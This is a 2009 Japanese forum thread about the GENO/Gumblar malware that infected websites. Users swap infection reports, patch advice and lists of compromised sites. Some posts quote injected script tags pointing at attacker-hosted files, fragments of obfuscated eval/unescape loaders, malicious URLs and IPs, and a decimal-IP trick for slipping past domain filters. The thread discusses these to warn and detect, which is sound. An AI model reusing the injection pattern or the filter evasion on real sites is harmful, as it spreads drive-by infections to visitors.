もちろん、そのタイミングで何かに感染したのかもしれないけど・・・。

アドオン関連は3.0.12と3.51で同じのしか入れてないから、
3.0.12で試して　その後、アドオン全オフの3.51環境を試してみます。

気まぐれに通信開始を試みている感じなので、検証には時間かかると思います。

一番良い結果は、これまでに書いたことが勘違いで、
通信先のInternet Security Systems　が安全なサイト　プラス　何かのアドオンがそこのデータを利用していることですね。

>>233 さんの書き込みで希望が見えてきました！

>>234
http://www.cman.jp/network/support/ip.html

いい加減スレチだしFirefox関連スレでアドオンさらしたほうが早いと思うけどね

>>235
thankyou!

Noscriptがざるだって初めて聞いたけどFirefox関連でボロクソいわれてるなあ
別のアドオン探すか

Noscriptってザルなの？

おれfirefox関連スレのROM専だけど、向こうでNoScriptをなんやかんや言ってるやつはPC初心者板並のスキルだと思うよ

opera使えよ

コピペ禁止スクリプトなんて余裕で貫通する最強ブラウザだ

opensauceなんだからdiffしてくださいな

>>239
スレはみてないけどほかで検証されてるから初心者云々関係ないよ
NoScript すり抜けでぐぐればすぐ出てくる

noscriptは許可サイトは丸裸
非許可サイトもIFRAMEをスルーしてしまう問題がある（最新verでも同様）
完全に気休めアドオンだね
本当に信用出来るのはブラウザでもアドオンでもセキュリティソフトでもなくvistaのUAC先生だけ
firefoxが駄目ならoperaに移るか！という浅はかな考えを抱いているとXPユーザーは痛い目に合う可能性がある

安全性だけなら2000でもXPでも制限ユーザーで動かせば同じじゃないか？

管理者権限をのっとってｒｙ

http://2749172507/
↑IEかchromeでアクセスすると変換してhttp://support.mozilla.com/ja/kb/Live+Bookmarksにつながる

HostsやURLドメインフィルタでブロックし難いようにしている、敵ながらあっぱれだよな
例えばttp：//2749172507/jp.jsのように jp.js などが付いているとうっかり信用して許可サイトに登録してしまう

>>242
NoScriptも万能じゃないし、一つに頼り切るのも危険じゃん

「NoScript すり抜け」検索のブログで検証
一応そのブログのIFRAMEは完全にブロックできてた（下記画像Firefox3.5.1）
http://up2.viploader.net/pic/src/viploader1100692.jpg

＞NoScriptも万能じゃない

確かに。

あくまでも補助機能としてnoscript入れてるんだろ
誰もこれさえ入れていれば大丈夫と思ってるやつはいないだろ

>>247
うちもブロック出来てた。
すり抜け現象はそのブログの中の人の設定ミスかなんかじゃないのか。

なんかわからんがよｓ

>>246
よく分からんが、やばそうなので、
どういうことか詳しくおしえてくれ。

これだとマイクロソフトだと一目でわかる↓
http://www.microsoft.com/ja/jp/default.aspx
これだと解りにくい↓
http://3475948030:80/ja/jp/
上記の両方とも同じサーバーの同ページにつながる

ここで、www.microsoft.comが悪意のあるサイトと仮定する。
信頼している、ゲーム・動画サイトでFxのNoscriptがhttp://3475948030:80/ja/jp/をブロックしたとする
一般的にゲームや動画ができるまでセキュリティを弱め許可していくだろう
.cn/などのトップレベルドメインなら警戒するが、URL内にjpが入っていると比較的安心な国内鯖などと勘違いして許可してしまう恐れがある。
他には、フィルタリングソフトなどで.com/の全てをブロックしてもhttp://3475948030:80/ja/jp/はすり抜けてしまう。

※上記リンクは全て信頼のマイクロソフトのサイトです。

hosts
127.0.0.1　　www.microsoft.com
フィルタリングソフト
禁止　www.microsoft.com　及び　.com

上記のブロックをしても埋め込まれたhttp://3475948030:80/ja/jp/はすり抜ける
まぁ具体的なサンプルでないので解りにくかったかも知れない

ネットもリアルと同じように詐欺が存在する。
VistaUAC、FirefoxNoscriptなどで武装しても罠にかかる人はかかる。
それぞれの特性を理解して使わなくてはいけないということでしょう。

>>250
キャッシュファイルは完全に消してからやった？

だいたいURLが数字ばっかのところに行くか普通

>>257
数字でも英数字でもひらがなでも
普通は行くよ

ttp://さだまさし.jp/

マイクロソフト・ホーム
http://tinyurl.com/microsoft-japan

>>259
GoogleChromeは可、その他不可

>>257-258
……(^ω^; )

Adobe糞が7月中に対策してもまたすぐボロがでると予想

>>258
J-Wordに犯されてるか、
アドレスバーから検索できる設定になってるＩＥと見た
多分後者だなｗ

>>263
258は普通に日本語ドメインのことじゃないの？

日本語ドメインだな

どっちにしろ>>258は>>257の言いたかったことがわかってないような

こだわるなよ

>>263
IEは７から日本語ドメインに標準で対応
J-Wordもアドレスバーに文字を入れて日本語URLの検索できるが
普通J-Wordは使わないだろ

それと２ちゃんは日本語URLが貼れても機能しないんだよな

うちのパソコンはNoscript すり抜けはしないけれど、
保険で他にも複数IFRAME対策等を入れているから
一つや二つの対策ソフトがバグっても安心です

こだわりやな

シンプルかつ効果的な対策をモットーにしてますｗ
まだまだXPも現役だからUACに頼らない対策もしてるよ

どこまで再現出来るかは分からないがXPユーザーでも
UACもどきな非公式ソフトやノートンの制御設定で似たような事ができるかも

2kやXPでVistaのUACモドキなことをやってたから
Vista出たときUACの使い勝手の良さに感動したけれど
巷では最低の評価だったなぁ…

ブログの中の人、かわいそう
だれか、助けてあげて

あんたが余計な事をやったんじゃないの

リカバリー推奨

俺たちのリカバリー・ナイト
おまえリカバリ

GENOの歩き方
http://tsushima.2ch.net/test/read.cgi/news/1248744891/

どうでもいいけどセキュリティ板にFlashとadobe readerの専用スレたてろよ
どうみてもあちこち集中攻撃受けていて、今旬のこの板の花形ですがな

必要だと思うなら自分でたてろよカス

セキュリティ板は高スキルが求められる
厨房らには荷が重すぎたってわけよ

セキュリティソフトが扱えるだけでは芋扱いされるだけだしな

ようやくflash　playerが更新

情報元は忘れたんだが、
watch_akibaのTwitter　↓　がよく利用している
http://twitter.com/watch_akiba

twitpic.com（174.36.0.0 - 174.37.255.255）　って危ないのか分かる人いない？

数週間前にどこかのサイトを元にファイアーウォールのブロックIPにガンガン登録していったら、
この範囲をドンピシャで登録していたみたなんだが、とんでもない数の利用者が存在するはずだから、
本当にヤバイのか、自分がボケていただけなのか分からなくなった。

watch_akibaのTwitterにいって、画像リンクを踏むとtwitpic.comにつながるよ。

>>253
ペアレンタルコントロールとかで、ドメイン指定ブロックだと危ないから
リモートIPでブロックしていれば安心ってことかな？

Adobe Reader更新きました

　

結局大手のアンチウイルスソフトで対策できてるところは未だにないの？

そもそも被害者いないもん
架空のウイルス

と思いたいgeno社員乙

既出かもしれんが
ちんこアプロダっていう同人誌うｐしてるサイトがGENOウィルスに感染してることが判明した。
たまに見てた奴とかは気をつけろよ。

しばらくはアクセスしない方がいい。

5月の話じゃねーか。

ちんこアプロダ
危険度0%
安全なURLです。踏んでも大丈夫でしょう。

ウイルスバスターのフィッシングレベルを高にすれば
GENOウイルス系をほぼ100%防げるってあったけど
ウイルスバスターって意外と凄いんだな

安全なサイトもほぼ100%ブロックされますけどね

ttp://www.itmedia.co.jp/enterprise/articles/0908/19/news020.html
相次ぐサイト改ざん攻撃、「Genoウイルス」感染PCが関与か

原因を調べたところ、この顧客がホスティングサーバへのファイルアップロードに
使っていたPCが、「Gumblar」（別名JS-Redir、 Genoウイルス）タイプのマルウェアに
感染していたことが分かったという。ただし5月に出回ったGumblarとは異なる点もあり、
コードに手を加えた亜種の可能性もあるとしている。

バスターって確かGENO発生当初にこのウイルス対策をユーザーから問われて
「履歴を消してください」
と答えた素敵な会社だっけ。

>>GENOウイルス（通称）に御社は対応済でしょうか？

　　　＿＿＿ 　　　 ∧∧
　　/　||￣￣||　 .／台 ＼ ・・・・
　　| 　||脅威||　 （ハ´；； ）　
　　|￣￣＼三⊂/￣￣￣/
　　|　　　　|　( ./　　　　 /


　　　　　ｶﾀｶﾀ　ｶﾀｶﾀ
　　　＿＿＿ 　　　 ∧∧
　　/　||￣￣||　　／台. ＼ ？！　GENOウイルスって何アルカ？？
　　| 　||安心||　 （｀ハ´* ）　
　　|￣￣＼三⊂/￣￣￣/
　　|　　　　|　( ./　　　　 /

バスターさんはWinnyグループの一員だからなぁ

ほす

■新型の「Webウイルス」が感染拡大
http://pc.nikkeibp.co.jp/article/trend/20090722/1017170/?set=rss

セキュリティ会社や組織は5月中旬、「Gumblar（ガンブラー）」などと呼ばれる新たなWebウイルス（Webページに埋め込まれるタイプのウイルス）が
世界中で感染を広げているとして注意を呼びかけた。
脆弱（ぜいじゃく）性のあるパソコンでは、Webウイルスが埋め込まれたページにアクセスするだけで被害に遭う恐れがある。実際、国内でも多くの被害が報告されている。




■09月04日のWeb改竄情報
https://www.netsecurity.ne.jp/9_13925.html
■09月03日のWeb改竄情報
https://www.netsecurity.ne.jp/9_13910.html

あのーすみません、
当初お菓子やさんだかなんだか休日に
電凸するかとか言ってる時居たんだけど
まさかまだ放置なの？
そろそろ許してやるかってGENO見ようとしたんだけど…

あれ、GENOウイルスチェッカーとか言うサイト繋がらないけど閉鎖したのか？

さすが糞さいと

再起動画面のまま、何度再起動させても電源切っても全然起動出来ないです。GENOでしょうか…
対策何もしてなかったので。
どうしたらいいのかわからないです
もうパソコンは二度と起動しないのでしようか。

セーフモードでやってみ？
だめならCDブートだ。（OS再インストール）

>>304 セーフモードだめです
OS再インストール…はやってないです。いつも使ってないスクリーンセーバーをダウンロード&設定した後だったのでそのせいだ 休ませれば直ると信じたかったのですが…。orz

早いレスありがとうございました。

ＣＭＤがいつのまにか起動
パソコン重い
しかしファイルサイズは正常
別のウィルスだなこれは……

avastで駆除できたっぽい。
sqlsodbc.chmが消えたし。win2000

やっぱavast凄いな

208.87.

win2000でavastで削除してsqlsodbc.chmを消去して
その後また復元してなければ大丈夫？

GENO感染したのですが、
個人情報流出は具体的にどの程度なんでしょうか？
保存してるファイルも流出してしまいますか？

PC素人です。
どなたか教えてください。

梨花ブログが感染してて、連休中で対処できてないからエライことになってる。

行ってないからわからんけど貼られてる広告にやられてるのかな
りんかもとんだとばっちりだな

>>313
ちょうど連休前の金曜の夜からおかしくなって、スタッフも休んでるのか未対応。
メッセージもスタッフ通してから梨花に送られてるみたいで、本人も知らずに更新しまくり。
梨花スレは大混乱。

確かGENOも休み中にやられたんだったよな
ブログ見てPCリカバリとかマジ最悪だね
PC詳しくない奴はどうするのか
自分の手に負えない奴もいっぱいいそうだ

>>315
梨花ブログ見る層はパソコン詳しい人あんまりいなさそうだからね。
私もその１人で、不安になってこのスレ来てみました。
ファイル名を指定して確認？したら一応大丈夫そうだったけど、亜種もあるみたいだから油断できませんよねー
ほんとうろたえてますｗ

FlashPlayerは最新に
PDFReaderも最新に
JavaScriptは基本的に切っておく
これでだいたいは防げるはず
初心者はIEを使うよりもFireFox＋NoScript使用のほうが安全

コマンドプロンプトが立ち上がればよかった筈だが

vistaにしてUACを使う
が一番いい

vista＋UAC＋砂箱

これで核級のウイルスがきても全部シャットアウト

win2000でavastで削除してsqlsodbc.chmを消去して
その後また復元してなければ大丈夫？

>>320
全部はシャットアウトできない
砂箱にもUACにもどうせ穴がある

アーモー大騒ぎ

ウィルスバスターでGENOウィルスが隔離されていました。
まとめサイトにある確認法で調べたら、
cmdの値？が正常ではなく、低いままでした。
まだ感染しているということでしょうか？

一度感染したという事は既にシステムがぼっこボコにされている可能性が高いから
クリーンインストールした方がいいと思うんだ。

>>325
システム？もやられるのか？
俺もavastで知らぬうちに削除してて（たぶん）その後、変な挙動はないのだが

>>326
カスペとかノートンのオンラインスキャンして見て検出なければいいじゃね？

オレは精神衛生上の問題でクリーンインストールするけどね

ｋスペでやったけど問題なかったよ

genoじゃないがサイト巡回してたらノートンのIDセーフ（かなりいい加減）が真っ赤になったから
ソース確認したら本当に埋め込まれててふいたｗ
activexの脆弱性を突くタイプでvista/firefoxじゃなかったら感染していたんだろうな

萌えミシュラン感染してる

上記サイトのソースの中に
変なURLの記述がある
(.ruのロシアのサイト？)
改竄されたみたい。

管理人が気付いて
「当サイトのトップページが改竄されました」
っていう文章に内容が変わってるけど
それも改竄されて
また別のロシアのサイトのURLが…

そのロシアのサイトのページは空
今のところ無害

と思ったが何かうまくやって
空のページが表示されるときがあるのかもね
無害は取り消し

>>330
Googleだと危険なサイトと表示されるね
ttp://www.google.com/safebrowsing/diagnostic?site=http://moem.hp.infoseek.co.jp/&hl=ja

>>330
行ったことがないサイトだけど報告ありがとう。

今さっきGENOウィルスの存在を知った
片っ端から調べて、うちのＰＣもチェックしたが、感染してなかった

とりあえず

OS→Vista
ブラウザ→FireFox最新版
セキュリティ→ノートン2009
・Adobeリーダー＆フラッシュプレイヤーをアップデート
・Ｊａｖａスクリプトオフ
・Adobeリーダーのスクリプトもオフ
・今後しばらくネットは可能な限り携帯でカバーする予定

て感じなんだが、なんかまだまずいことある？
５月ごろまでの情報しか探せなかったんだよ…今現在でもこの対策で大丈夫なのか教えてくれ
これだけは調べきれなかったんだ、すまん

Windows updateもしておけ

>>336
サンクス
いまやってる
あとUACもオンに直しておいた

このウィルス自体は今はとりあえず全く動き(新種出たとか)はないと思っていいの？

Vistaには無害

>>338
あれ、俺が見たサイトにはご丁寧にVistaのチェック方法なんて載ってたんだが…
それはなぜなんだぜ？無害なら必要なくね？
純粋に疑問

用心しろってことじゃね
無害だよ
GENO自体はもう見ないけど
似たような物もあるし用心はしておいた方が良いってことじゃね

>>340
ありがとう
今ざっと調べてきたが、「今のところ無害だが油断はできない」みたいだな

ひとまず落ち着いてはきたんだな
これをいい機会に気をつけるわ
本当助かった
皆ありがとう

初期にはvistaでもウィルスにかかってた人がいたからな。UACを切ってたせいで。
だからまぁ、vistaでもたまにはsqlsodbc.chmのファイルサイズが
50,727 バイトであることを確認しておくのも悪くない。

それは嘘だろ

vistaが安全かどうかに関係なく
GENOはVistaやServer2008は最初から除外してる
UACは無関係
感染は嘘

UAC無効だとGENO”以外”での似たような構造を持ったウィルスの感染例はあるな
GENOそのものはXPを切り捨てるだけでOK

>>338
嘘
UACをOFFしてあるならアウト
あちこちの初心者サイトでOFFにするおすすめが載っている現状で
その結論は危険

何を言ってるんだ君は

適当な糞アフィサイトに騙されとる

なんか勘違いする人もいそうなので
>>346
Gumblarはたはgenoウイルス と呼ばれる物について話してる
これに関してはVistaは対象外ということ
Vistaが他の攻撃に安全と言ってるわけではない

イラストサイトの
Pafe Cafe
http://red.sakura.ne.jp/~izumi/
感染してた。(現在は対策済み)

Googleキャッシュにはもう残ってないが
百度のキャッシュには残ってた。

HTMLのソースコードはavastで
HTML:Illiframe-C [Trj]として反応

http://soul-of-man.ru:8080/index.php
(IPアドレス:85.17.138.27)
に飛ばそうとしてたみたい。

萌えミシュランが感染した時も
いくつかのサイトに飛ばそうとしてたが、
その中に85.17.138.27もあったと記憶している

>>350
脆弱性が使われてたの？

>>351
上のサイト(.ruドメインの方)に
アクセスすれば
脆弱性を付く不正なPDFファイルとか
不正なフラッシュファイルとか
ダウンロード出来ると思う。

アクセスしたくないけど。

そういうサイトに無理矢理、強制で
誘導しようとしてた。

>>352
恐ろしいな。
既存の脆弱性ならいいんだけどね。

GENOウイルス感染したかも・・・。
ヤバイと思ってPC電源切っちゃったあと
起動しようとしてもPC再起動繰り返す
（多分ブルースクリーン）ようになったから
もう確認のしようがないけど。

何か勝手にアドビリーダー開いたり
謎のtmpファイルを勝手に開こうとしたり
コマンドプロンプトで一瞬何かやってたので
GENOウイルスで間違いないと思う。

どうやってデータ復旧しようか考え中。

>>354
あらかじめ対策ってとってましたか？
もし、とってても感染したなら焦るのでよければ教えてケロ。

>>355
GENOウイルスの存在自体知らなかったので対策はとってませんでした。
ただAdobeReaderとIEのFLASHは9月中に一回アップデートしていました。
しかし今回はOperaを使ってHP閲覧してて、
IEのFLASHはアップデートしててもOperaのFLASHは古いまま
だったのが敗因のようです。

>>356
�d
他スレでまた活動始めたなんて話も聞くので、
新たな対策が必要なのかな、と少し焦りました。

adobeは最近頻繁にうｐデートするから注意必要ですね。
データ復旧マンドクサだろうけど、がんばってケロ。

>>356
Readerの最新は10月14日だからそれもアウトだね。

他スレに貼ったやつだけど貼っとく
今回はMS09-043あたりもからんでるみたいだからMicrosoft Updateもしてね

対策
・MSUpdateをする
　http://www.update.microsoft.com/microsoftupdate/v6/default.aspx?ln=ja
・Adobe Reader(Acrobat, Acrobat Reader)を使ってないならアンインストール
　使ってる場合は9.2.0に更新
　インストールの有無はプログラムの追加と削除から確認
　DLサイト
　http://get.adobe.com/jp/reader/
・Adobe Flash Playerの更新(動画サイト見てるなら絶対入ってる)
　最新は10.0.32.18
　確認はこれ
　http://www.adobe.com/jp/software/flash/about/
　DLサイト
　http://get.adobe.com/jp/flashplayer/

Flash PlayerはIEとそれ以外で違うよってのも追記だな

Adobe ReaderもAdobe Flash Playerも削除したよｵﾚ。
どうせ使わないし。

2009.10.18 日曜日 (手抜き版)
http://www3.atword.jp/gnome/2009/10/18/oct-18-09-sun-rapidly/
Gumblar strikes back?
[EMERGENCY]
先日、さまれぼ！管理人様より警報を受け取っていたのですが、Gumblarに強いScanSafeも警報を発しました。
Gumblar Website Botnet Awakes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
sqlsodbc.chm
という、悪夢のキーワードをもった Gumblar(GENO/zlkon/Martuz/JSRedir-R/Daonol)が、蠢動を再開した模様です。

現時点で使用されている脆弱性は
MS09-043 : Microsoft Office Web コンポーネントの脆弱性により、リモートでコードが実行される (957638)
という、９月に塞がれたものですが、それ以外にも脆弱性攻撃を仕掛けてくる可能性がありますので注意が必要です。

※マイクロソフト セキュリティ情報 MS09-043 - 緊急
http://www.microsoft.com/japan/technet/security/bulletin/MS09-043.mspx

お騒がせしました。
感染したHDDを他PCに取り付けてウイルスチェックしたところ、
GENOウイルスではなかったようです。
何らかのサイトを見たことによってAVCareというソフトが
インストールされてしまったようです。
（いかがわしいサイトではありません。遊戯王のCDについて
調べていたときに起きた出来事です。）

他にもトロイが2、3個検出されていましたが、
いずれもGENOウイルスとは関係ないようでした。

症状が似ていた理由は不明ですが、sqlsodbc.chmの
ファイルサイズが正常だったことから見ても
GENOウイルスの感染ではなかったようです。

しかし、HPを見るときに注意することに越したことは
ないみたいですね。もしかしたら似た仕組みで
インストールされたのかもしれないので・・・。

>>363
最新版のGeno亜種は検出できるの少ないみたいだから無いとは言い切れないよ
つーかそんだけいろいろ感染してた状態ならOS入れなおしたほうがいい

今回のはC:\になんとか.bakってのを常駐させるくさ
(ファイル名ランダム)。

再襲来したGENOウイルスについて報告してるブログみつけた。
ttp://blogs.yahoo.co.jp/noooo_spam/59011285.html
ttp://blogs.yahoo.co.jp/noooo_spam/59020592.html
ttp://blogs.yahoo.co.jp/noooo_spam/59029561.html

zlkon/gumblar/martuzは単一ホストでウイルスを撒いてたけど、
今度のスクリプトだと陥落した別サイトで撒いてるから、
従来のチェッカーじゃ判別できないな。

糞通販ショップGeno ウイルス再び
http://tsushima.2ch.net/test/read.cgi/news/1255886283/

今回もAvastはスクリプトを検知出来るようだ。

>>368
いくつかパターンがあるみたいだけどそのうち１つは反応した
もう1つはスルー
他はわからん

>>366
チェッカーは知らんけど挿入位置は同じっぽいな

もう少し詳しく挙動を解説したブログ
ttp://ilion.blog47.fc2.com/blog-entry-154.html

ウイルスをホスティングしてる改竄サイトが無数にあるわけだ。
もぐら叩きだな、これじゃ・・・

感染してるサイトのurlをチェッカーに突っ込んでみたが、危険度0.5％
でスルーされた。

あんなの誰も使ってないだろ

今回のはだめだ…HTMLソースにこれあったら確実にアウト、みたいなルールが作れねぇ。

何したいんだかわからんけど>>366見た感じこれでよくね
.php ></script><body>

PHPファイルも見れるならこんな行があるか見るとか
eval(unescapse(*.replace(/[*]/g,*)));

だいたいこんなパターンでそ
//<script>
try{if(hoge='適当な文字')throw new TypeError('');}catch(){}
moge='難読化コード';
eval(unescapse(hoge.replace(/[huga]/g,hoge)));
ここに何かあるときもある
//</script>

.php ></script><body>
これじゃ有害とは断定できねーべ
踏み台側のを拾いに行くのも正直めんどい

何したいのかわからん
誤爆率そこまで高くないと思う
まったくないわけじゃないだろうけど
ローカルでやるには気にするほどではないレベル

ttp://www.ripping.org/

某スレでこのスレが紹介されていたので来ました
上記サイトなんですが、検索エンジン（google)の結果の地点で警告が出るのですが
サイト上に何か仕込まれているんでしょうか？
一見、何の変哲もないPC関係のサイトのように見えますがブラウザレベルでもブロックをくらうようです

「今は」特に何もないけど。

>>378
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=ja&site=http://www.ripping.org/
疑わしいサイトとして認識されています。
このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
不正なソフトウェアは t-age●ru/ を含む 1 個のドメインでホストされています。

この結果を使用しているFirefox、Chromeで見るとアウト判定になる

いまは見た感じなさそうだけど、攻撃スクリプトを誰が削除したのかわからないから
うかつに見ないほうが良いだろうね

>>379,>>380
大変参考になります
有難う御座いました

セキュリティホールmemo
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2009/10.html#20091020

リンクだけだけど、大御所来た。これでボンクラ鯖管も注意を払うといいが…

>>382
おっかないから
「aguseゲートウェイ(代理読み込み)」
http://gw.aguse.jp/
を使って見てきた俺ガイル orz

>>383
石橋を叩いて人に渡らせる行為をなにも恥じることはあるまい。

334 名前：GENO 投稿日：2009/10/20(火) 17:13:09 ID:pXNvHr1I0
ここ見てあちこちGENOスレ回ってきたら

> 感染したまま放置されてたサイトや、
> 対策が不十分だったサイトを見たら、さっそく変なスクリプト発見・・・

マジすか・・・


335 名前：GENO 投稿日：2009/10/20(火) 17:24:34 ID:mGYwobiA0
>>334
マジです。

たとえばGenoVirus感染サイトリストに出てる「対策済み」サイトの中にも、
再感染してるのがある。
もっと言えば、告知なしで再開してるサイトの一部。
告知なしで再開して、再感染したところは、
管理者が根本的な対策（OSの再インストール→サイトの復旧）を
やってなかった（自分のPCの感染に気づいていない）んでしょう。。。

ttp://www.weekenddream.jp/keiba_news/cat70/20091021_1.html
ＪＲＡレーシングビュアーでサイト改ざん　ウイルス感染の疑い（2009.10.21）

株式会社中央競馬ピーアール・センターは２０日（火）、
ＪＲＡレーシングビュアーの一部ページが一時改ざんされ、
改ざんされた期間中にサイトを閲覧した会員が
ウイルスに感染した疑いがあると発表した。

サイト改ざんされた疑いのある期間は
１５日（木）１８時から２０日（火）１３時までの間。
この期間中に悪意のあるコードがサイト内に埋め込まれ、
サイトを閲覧すると
"Gumblar"または"JSRedir-R"
（通称「GENOウイルス」とも呼ばれる）
に感染する可能性が生じたとのこと。
サーバー管理会社に調査依頼の上、
現在はこの悪意のあるコードはすべて除去され、
ウイルス感染の心配はないとのこと。
またこのサイト改ざんによる
個人情報の流出はないとのこと。

なぜこういうのをAdobeが作らないのか…。

Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
http://www.forest.impress.co.jp/docs/review/20091020_323014.html

>>386
レーシングビュアーは会員向けの有料サービスなのか
ホームページには普通にアクセスしてたからビビったけど
とりあえず害は及ばずといったところか
しかしＪＲＡがGENOウイルスとハッキリ認識しているとは
GENOの知名度って想像以上に高いなあ

>>387
これはいい

おれ素人だけどGENO見終わって閉じようとしたら何回やってもだめで
怖くなって電源切った。これだったのかウィルスソフトはいれてますが。

何の責任も負わない個人が作ったものだし、
作者がその気になれば偽物をDLさせられて泣きを見るだけだろ。

>>391は>>387に対してのものか
だからこそ
＞なぜこういうのをAdobeが作らないのか…。
個人ではないベンダーに期待を寄せるような
コメントが書き添えられているのではないか

なぜも何も自動でアップデートするようになってるだろ

えっ

Genoウイルス(Gumblar)検出状況
http://slashdot.jp/~pluto/journal/491348
このphpファイルは見に行くたびに変わりますが、
カスペルスキーさんはまるで「おれにまかせろ」状態。かっこいい。

>>390
ウイルスはいれちゃだめよ

>>394
えっじゃねえよ
頭使えよ

頭使うもなにも
自動でアップデートとか初耳なんだが
設定しだいで出来るってことなのか？

正確にはアップデート確認か
求めてることは同じだろ

Flashはアップデートの確認
Readerはアップデートまで自動でやってくれるね

そんなに自動が好きなのか

何を言ってるんだ君は

Readerはたしか環境設定のアップデータの項目に
自動にするしないの選択項目があってわかりやすいよ
ただしこれは最新版の場合ね

それより前のバージョンだと、環境から一般いってそこに
アップデートについての選択項目があったと思う

>>386
しかしＪＲＡが感染してたのに騒ぎにもならないとは
もう、みんな対策を済ませてたのか
そんなはずはないな
GENOウイルス自体に、もう関心がなくなってるのか

前回の時も全然ニュースにならなかったよ。
分かり難い害だから話題にしにくいんじゃない？

”みんな”はウイルス自体に関心がないからな・・・
認知されるのはいつも通り被害が十分に行き渡ってからだろ

ヤフーに乗ったのもずいぶんたってからだったしな

ひきこもり共和国という交流サイトがやられた模様。
http://love6.2ch.net/test/read.cgi/hikky/1221915065/827-

>>404
馬券買ってるおっさん世代はウイルスなんて知らんのじゃないか？

馬券買うってことは金銭とか扱うだろうしJRA早いとこ対策しないとまずいんじゃ

JRAまじかよーorz
ノンスクリプト許容してるサイトなのにorz

こんなとこ来るような人なら実害ないだろ

>>411
JRA確認してないんでわからんけど、通常であれば
外部ドメインにしこまれてたはずだよ
全許可ならダメだけど見知らぬドメインは許可されてなかったんじゃないかな

OSがvista以降なら問題ない

ガンブラさんは今月で3つも確認
いずれも個人サイト

JRAの潔い態度に感動したです
GENOも、これくらい堂々としてたら…

【セキュリティ】「GENO」に酷似したウイルスが流行の兆し、国内60サイトで感染確認（09/10/23）
http://pc11.2ch.net/test/read.cgi/pcnews/1256299220/

GENOウイルスに類似したあらたな攻撃が発生　
http://tsushima.2ch.net/test/read.cgi/news/1256287835/

ここに出入りしているのは、ちゃんとupdateしているような奴ばかりだから情報が集まらないな。
もっとレベルの低いところじゃないと。。

Gumblar類似のDaonolが広がってるみたい
全国でPCが起動しなくなるトラブルが多発。PC初心者の多い富士通サポセンがパンク状態　
http://tsushima.2ch.net/test/read.cgi/news/1256308562/

黒い画面にマウスカーソル (Win32/Daonol)
http://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx

>>420 DaonolとGumbarの因果関係は現時点では不明というか
憶測の域じゃないのか

>>421
ウイルス名は各ベンダーが好き勝手に付けてるから。Daonol=Gumblar。
ttp://internet.watch.impress.co.jp/cda/special/2009/05/21/23523.html
>なお、このウイルスは「Gumblar」という名称以外にも、
>Symantecでは「Infostealer.Daonol」、
>マイクロソフトでは「Win32/Daonol.F」、
>Kasperskyでは「Trojan-Dropper.Win32.Agent.apfn」といった名称が付けられている。

>>422　サンクス。ようやくわかった。
ていうか大昔にウイルスの名前をベンダー間で統一しようって言ってたんじゃないのかよ。。

Genoウイルス(Gumblar)再び
ttp://slashdot.jp/submission/36590/GenoGumblar

■「Gumblar」酷似ウイルスが流行の兆し、国内60サイトで感染確認
ttp://internet.watch.impress.co.jp/docs/news/20091023_324076.html

黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx

ＪＲＡレーシングビュアーでサイト改ざん　ウイルス感染の疑い（2009.10.21）
ttp://www.weekenddream.jp/keiba_news/cat70/20091021_1.html

「Gumblar」の脅威再び―Kaspersky が警告
ttp://japan.internet.com/webtech/20091023/4.html
Gumblar に酷似、新たな脅威発生に警告
ttp://www.kaspersky.co.jp/news?id=207578788

ウイルス・セキュリティ情報 | dynabook.com サポート情報
コンピュータウイルス「Torojan.Win32/Daonol.H」について
ttp://dynabook.com/assistpc/info/20091022.htm

コンピュータウイルス「Win32/Daonol」に関するご注意
ttp://supportapj.dell.com/support/topics/topic.aspx/jp/shared/support/news/2009/20091022?c=jp&l=ja&s=gen

ttp://cycle-world.jp/
ここも？

>>425
ぽいね

>>425
やられてるね
あと、URLを書くときは“.”を“●”などに置き換えて

スタッフブログの方は無事っぽ
普通に毎日更新で見てるっぽいし教えるべきかな？

がっつり逝ってる
ワロス

何のサイト？
さすがに踏みたくない

西日本最大級オートバイ用品専門店らすぃ

>>431
ありがとう

<script src=*****mages/index.php ></script>
の部分がそうか？
繋がんないけど

サイトも店の色も派手なツートンなんでドンパチよろしいんじゃないんでしょーか

>>433
スクリプトだけ書いてあるページに飛ばされるっぽいが…
ソースチェッカーで見たのでレイアウトは知らん

スタッフブログ※欄に凸っていいのか？
だが何を書いたらいいのかよくわからんので
詳しい人がやってくれるならお願いしたいが

>>433
接続2回目は拒否られるよね
調べ回避の手段っぽいわ

やっぱVistaだと無効なんだな
もちろん7もだろうけど

>>428
24日土曜も更新してるね
余裕っすね

これはXPから7へ移行させようとするマイクロソフトの陰謀だったんだよ！！

ΩΩΩ＜な（ｒｙ

まぁ実際問題7がびす太ほどアレじゃなければ乗り換えようかと思ってるがな

vistaでもUAC切ってたらマズイんだよな？
やかましいから切ってるけど

スタッフ写真無くて（´・ω・） ﾂﾏﾝﾅｽ

>>441
この件に関してはUACは関係ない
もちろん有効にしておいた方がより安全だが

結局だれも教えに行ってないのかﾊﾞﾛｽ

管理者様

急啓
ていへんだぁていへんだぁ
おたくのサイトがていへんだぁ
顧客に毒盛り、ていへんへんだぁ
　　　　　　　　　　　　　　かしこ


ＦＡＸ番号わかったけど（´・ω・） ﾂﾏﾝﾅｽ

ググるとHPのタイトル部分にスクリプトを埋め込まれたのがいっぱいヒットするな、もう無差別攻撃か・・・

http://p-frying●com/

ここも感染してる
ていうか前のGENO騒ぎの時から感染してるっぽい

.は●に変えたがh抜き忘れたorz

この攻撃ってAdobeが脆弱性発表したらすぐに蔓延したんだよな
発表しなかったらこんなことにならなかったかもな
まあそう言うわけにもいかないのかも知れないが

>>446
なにでググってる？
martuzあたり？

木造で中古だと利回りがきつそうで（´・ω・） ｶﾜｲｿｽ

Avast!のWebシールドが最近の*.phpにも反応するようになった

糞チェッカー
バージョン指定書きで後で後悔するといったのにねえ
さすがアフィ厨

>>425-427
＜script src=hxxp://fotothhi．be/images/index．php ＞＜/script＞

．phpの中身
／／＜script＞
dLLdw=24;if（unescape）dLLdw='';jYCXE=unescape（'%'+dLLdw）;
〜中(難読化されてたから)略〜
eval（unescape（i0j.replace（／[IlN]／g,jYCXE）））;
／／＜/script＞

サイトはどうやって改ざんされてるんだ？

>>452
いろいろ試した感じだとIE6なら金曜くらいから拾ってそうな感じだった
